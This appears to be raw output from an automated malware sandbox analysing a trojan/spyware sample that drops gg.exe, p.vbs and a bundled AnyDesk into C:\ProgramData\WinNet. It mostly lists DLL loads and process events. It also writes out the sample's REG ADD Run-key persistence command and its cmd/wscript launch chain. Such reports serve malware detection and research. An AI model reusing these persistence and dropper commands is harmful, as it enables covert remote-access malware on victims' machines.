                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: dwrite.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: msimg32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: thumbcache.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: explorerframe.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dataexchange.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: d3d11.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dcomp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dxgi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: dlnashext.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wpdshext.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: dwrite.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: winmm.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: iphlpapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: winhttp.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: secur32.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: sspicli.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: msimg32.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: usp10.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: ntmarta.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: firewallapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dnsapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: fwbase.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: fwpolicyiomgr.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: netapi32.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: netutils.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wkscli.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: srvcli.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: netprofm.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: npmproxy.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dhcpcsvc.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: mswsock.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: rasadhlp.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: fwpuclnt.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: version.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: userenv.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: winmm.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: iphlpapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: winhttp.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: secur32.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: sspicli.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: msimg32.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: usp10.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: ntmarta.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: windowscodecs.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: thumbcache.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: policymanager.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: msvcp110_win.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wtsapi32.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dpapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dhcpcsvc.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: version.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: userenv.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: mscoree.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: version.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: dwrite.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: msvcp140_clr0400.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: textshaping.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: textinputframework.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coreuicomponents.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coremessaging.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ntmarta.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: mswsock.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: secur32.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: sspicli.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wbemcomn.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: amsi.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: userenv.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: dpapi.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: rstrtmgr.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ncrypt.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ntasn1.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: windowscodecs.dll
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe
                                Source: classification engineClassification label: mal76.troj.spyw.evad.winEXE@39/13@3/4
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C229A0 FormatMessageA,GetLastError,19_2_69C229A0
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C5FFEC LaunchGoogleChrome,CoInitializeEx,CoInitializeSecurity,GetCurrentProcessId,GetShellWindow,GetWindowThreadProcessId,LocalFree,OpenProcess,OpenProcessToken,DuplicateTokenEx,ImpersonateLoggedOnUser,CloseHandle,CloseHandle,CloseHandle,LocalFree,LocalFree,CoCreateInstance,RevertToSelf,CoUninitialize,19_2_69C5FFEC
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C62CE9 LoadResource,LockResource,SizeofResource,19_2_69C62CE9
                                Source: C:\ProgramData\WinNet\gg.exeFile created: C:\Users\user\AppData\Local\SystemCache
                                Source: C:\ProgramData\WinNet\AnyDesk.exeFile created: C:\Users\user\AppData\Local\Temp\gcapi.dll
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\p.vbs
                                Source: SysrI6zSkJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                                Source: C:\ProgramData\WinNet\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessorId FROM Win32_Processor
                                Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.ini
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                Source: SysrI6zSkJ.exeReversingLabs: Detection: 39%
                                Source: AnyDesk.exeString found in binary or memory: Removed multi-install failure key; switching to channel:
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeFile read: C:\Users\user\Desktop\SysrI6zSkJ.exe
                                Source: unknownProcess created: C:\Users\user\Desktop\SysrI6zSkJ.exe C:\Users\user\Desktop\SysrI6zSkJ.exe
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\embedded.exe
                                Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\p.vbs
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\WinNet\embedded.exe C:\ProgramData\WinNet\embedded.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs"
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\AnyDesk.exe
                                Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\p.vbs
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\WinNet\gg.exe "C:\ProgramData\WinNet\gg.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\WinNet\AnyDesk.exe C:\ProgramData\WinNet\AnyDesk.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\WinNet\gg.exe "C:\ProgramData\WinNet\gg.exe"
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess created: C:\ProgramData\WinNet\AnyDesk.exe "C:\ProgramData\WinNet\AnyDesk.exe" --local-service
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess created: C:\ProgramData\WinNet\AnyDesk.exe "C:\ProgramData\WinNet\AnyDesk.exe" --local-control
                                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                Source: unknownProcess created: C:\ProgramData\WinNet\gg.exe "C:\ProgramData\WinNet\gg.exe"
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                                Source: C:\ProgramData\WinNet\AnyDesk.exeWindow found: window name: SysTabControl32
                                Source: C:\ProgramData\WinNet\gg.exeAutomated click: OK
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: SysrI6zSkJ.exeStatic PE information: More than 302 > 100 exports found
                                Source: SysrI6zSkJ.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                                Source: SysrI6zSkJ.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: SysrI6zSkJ.exeStatic file information: File size 21906944 > 1048576
                                Source: SysrI6zSkJ.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x29d000
                                Source: SysrI6zSkJ.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x105200
                                Source: SysrI6zSkJ.exeStatic PE information: Raw size of snapshot is bigger than: 0x100000 < 0x110e600
                                Source: SysrI6zSkJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: SysrI6zSkJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: SysrI6zSkJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: SysrI6zSkJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: SysrI6zSkJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: SysrI6zSkJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: SysrI6zSkJ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-64\privacy_feature\privacy_feature.pdb source: AnyDesk.exe, 00000010.00000002.2885333394.00000000012CA000.00000004.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000030E2000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-64\win_dwm\win_dwm.pdb source: AnyDesk.exe, 00000010.00000002.2885333394.00000000012CA000.00000004.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.0000000003044000.00000004.00000020.00020000.00000000.sdmp
